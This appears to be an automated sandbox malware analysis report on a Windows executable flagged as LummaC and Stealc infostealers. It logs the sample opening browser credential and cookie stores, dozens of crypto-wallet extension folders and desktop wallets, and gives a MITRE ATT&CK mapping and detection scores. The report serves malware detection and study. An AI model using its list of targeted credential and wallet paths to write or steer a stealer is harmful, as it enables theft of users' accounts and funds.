Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Source: Yara match

File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR

Remote Access Functionality

Yara detected Credential Flusher

Source: Yara match	File source: 0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6e1fbaaba5.exe PID: 7984, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	411 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	12 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	11 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	212 Process Injection	33 Software Packing	NTDS	236 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	961 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	361 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	361 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	56%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
